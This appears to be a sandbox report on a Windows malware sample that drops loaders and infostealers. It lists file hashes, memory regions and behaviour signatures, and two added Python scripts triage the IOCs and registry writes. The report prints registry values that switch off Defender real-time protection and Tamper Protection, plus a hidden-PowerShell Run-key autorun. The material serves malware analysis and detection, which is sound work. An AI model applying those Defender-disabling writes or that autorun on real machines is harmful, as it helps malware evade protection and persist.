SHA256 c64b312f0df88432f415c386b9a50fa22aba7a53ba2f72dadacc53f69fac9f3e
SHA512 bd99fb00c9316ce02669bebaffd3c4e9d46637463405f0f619704f336e336d48f2c8322072dedb51b9c5b913b0f534fb7aa89e94173511a7e799eb71bb5957e6

C:\Users\Admin\AppData\Local\Temp\2390.exe

MD5 d62e850c9581a62c7ef484d60a713e3c
SHA1 305e13f492eb9a5906bbdfc3bf0961b380c6ac2a
SHA256 c64b312f0df88432f415c386b9a50fa22aba7a53ba2f72dadacc53f69fac9f3e
SHA512 bd99fb00c9316ce02669bebaffd3c4e9d46637463405f0f619704f336e336d48f2c8322072dedb51b9c5b913b0f534fb7aa89e94173511a7e799eb71bb5957e6

memory/2236-184-0x0000000002690000-0x0000000002A88000-memory.dmp

\Users\Admin\AppData\Local\Temp\setup.exe

MD5 cac360e5fb18e8f135b7008cb478e15a
SHA1 37e4f9b25237b12ab283fc70bf89242ab3b83875
SHA256 e8689f69dd3d0a3bd5f6e4b3a85251583c4b3b1dbf03e0c30c6cf0048e6532f8
SHA512 7f0bd6103dd802de4a4665b460c8c178f32e6075094532ec43c83fc1d8595d9495772bf191669f4b72cc2d78f91b06e046a11bbd0ef935b040eeb31e741d2a32

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 2aa70916a47ad55b25b51b15e07ded8e
SHA1 4eac7c1c0af31e01535a895041741f1e250aa034
SHA256 f121d244be2845271e734c8eb9c60f2d49df063fecc19a3ee4f89bbc53c47c1d
SHA512 b1d99bedcc4b6b292d628d326f61ed085488aa9dcac003bb520e72ad0a662e6a7b834a59aa522038760a53a9983b949097836737e147084d88ae991d5d454954

memory/2236-191-0x0000000002690000-0x0000000002A88000-memory.dmp

memory/2444-190-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 2aa70916a47ad55b25b51b15e07ded8e
SHA1 4eac7c1c0af31e01535a895041741f1e250aa034
SHA256 f121d244be2845271e734c8eb9c60f2d49df063fecc19a3ee4f89bbc53c47c1d
SHA512 b1d99bedcc4b6b292d628d326f61ed085488aa9dcac003bb520e72ad0a662e6a7b834a59aa522038760a53a9983b949097836737e147084d88ae991d5d454954

memory/1668-193-0x0000000000910000-0x0000000000A10000-memory.dmp

memory/2236-197-0x0000000002A90000-0x000000000337B000-memory.dmp

memory/2444-195-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2444-198-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1668-194-0x0000000000230000-0x0000000000239000-memory.dmp

memory/1672-199-0x0000000074610000-0x0000000074CFE000-memory.dmp

memory/2236-200-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 cac360e5fb18e8f135b7008cb478e15a
SHA1 37e4f9b25237b12ab283fc70bf89242ab3b83875
SHA256 e8689f69dd3d0a3bd5f6e4b3a85251583c4b3b1dbf03e0c30c6cf0048e6532f8
SHA512 7f0bd6103dd802de4a4665b460c8c178f32e6075094532ec43c83fc1d8595d9495772bf191669f4b72cc2d78f91b06e046a11bbd0ef935b040eeb31e741d2a32

memory/1260-213-0x0000000003C20000-0x0000000003C36000-memory.dmp

memory/2444-214-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2856-220-0x00000000008E0000-0x0000000000A5E000-memory.dmp

memory/1672-227-0x0000000074610000-0x0000000074CFE000-memory.dmp

memory/2236-221-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2268-226-0x0000000000400000-0x000000000047E000-memory.dmp

memory/2856-230-0x0000000074610000-0x0000000074CFE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS497E.tmp\Install.exe

MD5 6a77181784bc9e5a81ed1479bcee7483
SHA1 f7bc21872e7016a4945017c5ab9b922b44a22ece
SHA256 38bab577cf37ed54d75c3c16cfa5c0c76391b3c27e9e9c86ee547f156679f2a7
SHA512 e6c888730aa28a8889fe0c96be0c19aad4a5136e8d5a3845ca8a835eb85d5dba1b644c6c18913d56d516ce02a81cd875c03b85b0e1e41ef8fd32fd710665332f

memory/2792-235-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2792-238-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2856-247-0x0000000074610000-0x0000000074CFE000-memory.dmp

memory/2236-243-0x0000000002690000-0x0000000002A88000-memory.dmp

memory/2268-234-0x0000000074610000-0x0000000074CFE000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

memory/2844-287-0x0000000010000000-0x000000001057B000-memory.dmp

memory/2156-292-0x0000000000DD0000-0x0000000000DD8000-memory.dmp

memory/1688-298-0x0000000000F30000-0x0000000001310000-memory.dmp

memory/1432-299-0x0000000000400000-0x0000000000627000-memory.dmp

memory/1432-301-0x0000000000400000-0x0000000000627000-memory.dmp

memory/2156-302-0x000007FEF5B20000-0x000007FEF650C000-memory.dmp

memory/2236-303-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2536-304-0x000000013F770000-0x000000013FD11000-memory.dmp

memory/2792-305-0x0000000000400000-0x0000000000413000-memory.dmp

memory/1320-306-0x0000000000400000-0x00000000004CF000-memory.dmp

memory/2236-307-0x0000000002A90000-0x000000000337B000-memory.dmp

memory/2844-308-0x0000000001350000-0x0000000001A3F000-memory.dmp

memory/2844-309-0x0000000000910000-0x0000000000FFF000-memory.dmp

memory/2844-310-0x0000000000910000-0x0000000000FFF000-memory.dmp

memory/2844-311-0x0000000000910000-0x0000000000FFF000-memory.dmp

memory/1320-313-0x0000000003130000-0x0000000003357000-memory.dmp

memory/2304-319-0x0000000001F60000-0x000000000264F000-memory.dmp

memory/320-318-0x0000000000CA0000-0x0000000000EC7000-memory.dmp

memory/1688-317-0x0000000074610000-0x0000000074CFE000-memory.dmp

memory/2156-316-0x000000001B1B0000-0x000000001B230000-memory.dmp

memory/2236-323-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2096-322-0x000000013F5F0000-0x0000000140100000-memory.dmp

memory/320-315-0x0000000000CA0000-0x0000000000EC7000-memory.dmp

memory/320-314-0x0000000000400000-0x0000000000627000-memory.dmp

memory/320-325-0x0000000000400000-0x0000000000627000-memory.dmp

memory/1320-312-0x0000000003130000-0x0000000003357000-memory.dmp

memory/2236-326-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1688-327-0x00000000002D0000-0x00000000002DA000-memory.dmp

memory/1688-328-0x00000000002E0000-0x00000000002E8000-memory.dmp

memory/1688-329-0x00000000051A0000-0x0000000005332000-memory.dmp

memory/1688-335-0x0000000004C90000-0x0000000004CD0000-memory.dmp

memory/1688-336-0x0000000004C90000-0x0000000004CD0000-memory.dmp

memory/1688-337-0x0000000004C90000-0x0000000004CD0000-memory.dmp

memory/1688-334-0x0000000000320000-0x0000000000330000-memory.dmp

memory/1688-338-0x0000000004C90000-0x0000000004CD0000-memory.dmp

memory/1688-339-0x0000000004C90000-0x0000000004CD0000-memory.dmp

memory/1688-340-0x0000000004C90000-0x0000000004CD0000-memory.dmp

memory/1688-341-0x0000000004C90000-0x0000000004CD0000-memory.dmp

memory/1688-343-0x0000000004C90000-0x0000000004CD0000-memory.dmp

memory/1688-345-0x0000000074610000-0x0000000074CFE000-memory.dmp

memory/1688-346-0x0000000004C90000-0x0000000004CD0000-memory.dmp

memory/2156-347-0x000007FEF5B20000-0x000007FEF650C000-memory.dmp

memory/2728-350-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2728-351-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2728-352-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2728-353-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2728-354-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2728-356-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2728-358-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2728-361-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2236-373-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2096-376-0x000000013F5F0000-0x0000000140100000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1ZACESTD47PO9LVCFEY1.temp

MD5 2d7b98b99eeaf5026fe7ebf719363e4b
SHA1 8e5dfd98380399fd484a2f8b05e929fae81d87d1
SHA256 3600a7192dbf23647543a82c31343993c9fd7b00e04c7d7f487476ed888f2cd2
SHA512 00dc39493b07eedb66acf9e8b8d40239019e980613098be4aed4dba0dd3f03da505df2f909fa829c2d3fb408847789ff8249443dd0f16bcbeff28bb8e0dac360

memory/2244-392-0x00000000027A0000-0x0000000002B98000-memory.dmp

memory/320-414-0x0000000000400000-0x0000000000627000-memory.dmp

memory/2536-430-0x000000013F770000-0x000000013FD11000-memory.dmp

memory/2360-432-0x0000000000080000-0x00000000000BE000-memory.dmp

memory/2360-434-0x0000000000080000-0x00000000000BE000-memory.dmp

memory/2360-435-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\AKYoIfz.exe

MD5 cd3191644eeaab1d1cf9b4bea245f78c
SHA1 75f04b22e62b1366a4c5b2887242b63de1d83c9c
SHA256 f626f7361d341ca2b7c67c2b20ca5ab516a6ce4104048c5a3ee3f2d83cc3039f
SHA512 79ebd59d2f66bf3f4417760ff1c9021b3d0e3dcb65da390bf377c3316ce675add82b79bd90750e9b98f68bd5a5625c2b863fadbd0bf447c372b14a619e43d57a

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

C:\Users\Admin\AppData\Local\Temp\Cab3832.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

C:\Users\Admin\AppData\Local\Temp\Tar3B8F.tmp

MD5 9441737383d21192400eca82fda910ec
SHA1 725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256 bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA512 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

C:\Program Files\Google\Chrome\updater.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2
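The file entries above list the same dropped file several times, under both the "\Users\..." and "C:\Users\..." spellings, interleaved with memory-region dump names. The script below is an added example, not part of the sandbox's own output or tooling: it parses that layout into one record per SHA256 with every observed path, validates digest lengths so a truncated hash cannot slip into an IOC list, and turns the memory/<pid>-<n>-<start>-<end>-memory.dmp names into per-process region sizes. The sample text is a constructed excerpt of entries copied from this page. The location notes (Temp and Roaming as user-writable, Program Files as a place to verify the Authenticode signature rather than trust the filename) are the example's own heuristics, and folding drive-less paths onto C: assumes a single system drive.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed excerpt of this report's Files section (hashes and paths are the
# page's own; the 2390.exe entry is repeated under two spellings on purpose).
FILES_SECTION = r"""
\Users\Admin\AppData\Local\Temp\2390.exe

MD5 d62e850c9581a62c7ef484d60a713e3c
SHA1 305e13f492eb9a5906bbdfc3bf0961b380c6ac2a
SHA256 c64b312f0df88432f415c386b9a50fa22aba7a53ba2f72dadacc53f69fac9f3e
SHA512 bd99fb00c9316ce02669bebaffd3c4e9d46637463405f0f619704f336e336d48f2c8322072dedb51b9c5b913b0f534fb7aa89e94173511a7e799eb71bb5957e6

memory/2268-173-0x0000000000400000-0x000000000047E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2390.exe

MD5 d62e850c9581a62c7ef484d60a713e3c
SHA1 305e13f492eb9a5906bbdfc3bf0961b380c6ac2a
SHA256 c64b312f0df88432f415c386b9a50fa22aba7a53ba2f72dadacc53f69fac9f3e
SHA512 bd99fb00c9316ce02669bebaffd3c4e9d46637463405f0f619704f336e336d48f2c8322072dedb51b9c5b913b0f534fb7aa89e94173511a7e799eb71bb5957e6

memory/2268-181-0x0000000074610000-0x0000000074CFE000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Program Files\Google\Chrome\updater.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2
"""

MEM_RE = re.compile(r"^memory/(\d+)-\d+-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512) ([0-9a-f]+)$")
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}  # hex digits


@dataclass
class DroppedFile:
    sha256: str
    hashes: dict
    paths: list = field(default_factory=list)


def normalize_path(path):
    # Fold the drive-less "\Users\..." spelling onto C: (assumption: one system
    # drive) and lower-case, since NTFS paths are case-insensitive.
    if path.startswith("\\") and not path.startswith("\\\\"):
        path = "C:" + path
    return path.lower()


def location_note(path):
    """Example's own location heuristic, not sandbox logic."""
    p = path.lower()
    if "\\appdata\\local\\temp\\" in p:
        return "user-writable temp"
    if "\\appdata\\roaming\\" in p:
        return "user-writable roaming profile"
    if p.startswith("c:\\program files"):
        return "vendor directory: verify the Authenticode signature before trusting the name"
    return "other"


def parse_files(text):
    """Return ({sha256: DroppedFile}, {pid: [(start, end, size)]})."""
    files, regions = {}, defaultdict(list)
    path, hashes = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MEM_RE.match(line)
        if m:
            start, end = int(m.group(2), 16), int(m.group(3), 16)
            regions[int(m.group(1))].append((start, end, end - start))
            continue
        m = HASH_RE.match(line)
        if not m:
            path, hashes = line, {}  # any other non-empty line opens a new entry
            continue
        algo, digest = m.groups()
        if path is None or len(digest) != HASH_LEN[algo]:
            raise ValueError("malformed entry: " + line)
        hashes[algo] = digest
        if algo == "SHA512":  # the last hash line closes the entry
            entry = files.setdefault(hashes["SHA256"], DroppedFile(hashes["SHA256"], dict(hashes)))
            norm = normalize_path(path)
            if norm not in entry.paths:
                entry.paths.append(norm)
    return files, dict(regions)


def ioc_rows(files):
    """Sorted IOC rows: (sha256, md5, observed paths, location note)."""
    return sorted((f.sha256, f.hashes["MD5"], tuple(f.paths), location_note(f.paths[0]))
                  for f in files.values())


if __name__ == "__main__":
    dropped, mem = parse_files(FILES_SECTION)
    for sha, md5, paths, note in ioc_rows(dropped):
        print(sha, md5, ";".join(paths), "[" + note + "]")
    for pid, regs in sorted(mem.items()):
        print("pid", pid, ["%#x-%#x (%d bytes)" % r for r in regs])
```

Run it over the whole Files section of a report and the output is one line per unique SHA256; anything that fails the length check is a copy-paste error to fix before the list goes into a blocklist.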

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-25 05:11

Reported

2023-10-25 05:13

Platform

win10v2004-20231020-en

Max time kernel

67s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\dfd8798cfe88efc66b69d0be9671d323.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Detect ZGRat V1

Description Indicator Process Target
(1 match; no description, indicator, process or target recorded)

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
(5 matches; no description, indicator, process or target recorded)

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\3334.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\3334.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\3334.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\3334.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\3334.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\3334.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
(8 matches; no description, indicator, process or target recorded)

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\34AC.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\3334.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\3334.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\2EEB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ve8yU8rb.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\wB2pn4Fi.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tm6xy0Sw.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\B42F.exe'\"" C:\Users\Admin\AppData\Local\Temp\B42F.exe N/A
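Three of the signatures above (the Defender Real-Time Protection policies, TamperProtection, and the Run/RunOnce values) are the same kind of row: a registry write, the value written, and the process that wrote it. The script below is an added example, not part of the sandbox's signature engine: it parses those rows, maps the NT-native key path to a hive prefix, folds away the WOW6432Node component (which is how writes from a 32-bit process appear on 64-bit Windows, so a hunting rule should match both views), and classifies each write with the example's own rules. Two caveats when reading the original rows: Tamper Protection is designed to block exactly the Real-Time Protection and TamperProtection writes shown, so the report documents the attempt, not whether it took effect on the detonation VM; and the five wextract_cleanupN RunOnce values are written by Windows' own wextract self-extractor stub to delete its IXP00n.TMP extraction directory at the next logon, so they mark five nested self-extracting layers (2EEB.exe down to the payload in IXP004.TMP) rather than attacker persistence. The only autorun the sample installs for itself is the socks5 value under the user's Run key, which starts B42F.exe through a hidden PowerShell. The sample rows are a constructed subset copied from this page.

```python
import re

# Constructed subset of the "Key created" / "Set value" rows from this report's
# Defender, TamperProtection and Run-key signatures (two of the five wextract
# rows are enough to show the pattern).
REGISTRY_ROWS = r"""
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\3334.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\3334.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\3334.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\3334.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\3334.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\3334.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\3334.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\2EEB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nI0rA6wA.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\B42F.exe'\"" C:\Users\Admin\AppData\Local\Temp\B42F.exe N/A
"""

# Key paths contain spaces, so the writer column is anchored on a drive letter
# (or N/A) rather than split on whitespace. The value is a C-style quoted string.
ROW_RE = re.compile(
    r'^(?P<op>Key created|Set value \((?:int|str)\)) (?P<key>\\REGISTRY\\.+?)'
    r'(?: = "(?P<val>(?:[^"\\]|\\.)*)")? (?P<proc>[A-Z]:\\.*?|N/A) N/A$'
)
HKU_RE = re.compile(r"^\\REGISTRY\\USER\\(S-1-5-21-[\d-]+)\\")


def normalize_key(key):
    """NT-native path -> hive prefix; fold the WOW64 view so one rule matches
    the same key whether a 32- or 64-bit process wrote it."""
    if key.startswith("\\REGISTRY\\MACHINE\\"):
        key = "HKLM\\" + key[len("\\REGISTRY\\MACHINE\\"):]
    m = HKU_RE.match(key)
    if m:
        key = "HKU\\" + m.group(1) + "\\" + key[m.end():]
    return key.replace("\\WOW6432Node\\", "\\")


def parse_rows(text):
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if not m:
            raise ValueError("unparsed row: " + line)
        val = m.group("val")
        events.append({
            "op": m.group("op"),
            "key": normalize_key(m.group("key")),
            "value": None if val is None else re.sub(r"\\(.)", r"\1", val),  # unescape \" and \\
            "process": m.group("proc"),
        })
    return events


def classify(ev):
    """(category, severity, detail) for one write. The rules are this example's own."""
    key, val = ev["key"], ev["value"] or ""
    low = key.lower()
    if not ev["op"].startswith("Set value"):
        return ("other", "info", ev["op"])
    if "\\windows defender\\real-time protection\\disable" in low and val == "1":
        return ("defender_tamper", "high", "disables " + key.rsplit("\\", 1)[1])
    if low.endswith("\\windows defender\\features\\tamperprotection") and val == "0":
        return ("defender_tamper", "high", "TamperProtection = 0")
    if "\\currentversion\\runonce\\wextract_cleanup" in low and "advpack.dll,delnoderundll32" in val.lower():
        m = re.search(r'"([^"]+)"', val)  # quoted argument = the SFX extraction directory
        return ("sfx_cleanup", "info", "wextract SFX layer, extraction dir " + (m.group(1) if m else "?"))
    if "\\currentversion\\run\\" in low or "\\currentversion\\runonce\\" in low:
        note = "autorun value " + key.rsplit("\\", 1)[1] + " -> " + val
        if "powershell" in val.lower() and "hidden" in val.lower():
            note += " (hidden PowerShell launcher)"
        return ("autorun_persistence", "high", note)
    return ("other", "info", "unclassified registry write")


def triage(text):
    findings = []
    for ev in parse_rows(text):
        cat, sev, detail = classify(ev)
        findings.append({**ev, "category": cat, "severity": sev, "detail": detail,
                         "writer_user_writable": "\\appdata\\" in ev["process"].lower()})
    return findings


def sfx_depth(findings):
    """Distinct wextract_cleanupN values = number of nested self-extracting layers."""
    return len({f["key"] for f in findings if f["category"] == "sfx_cleanup"})


if __name__ == "__main__":
    found = triage(REGISTRY_ROWS)
    for f in found:
        print(f["severity"].upper(), f["category"], f["key"], "<-", f["process"], "|", f["detail"])
    print("SFX nesting depth:", sfx_depth(found))
```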

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence
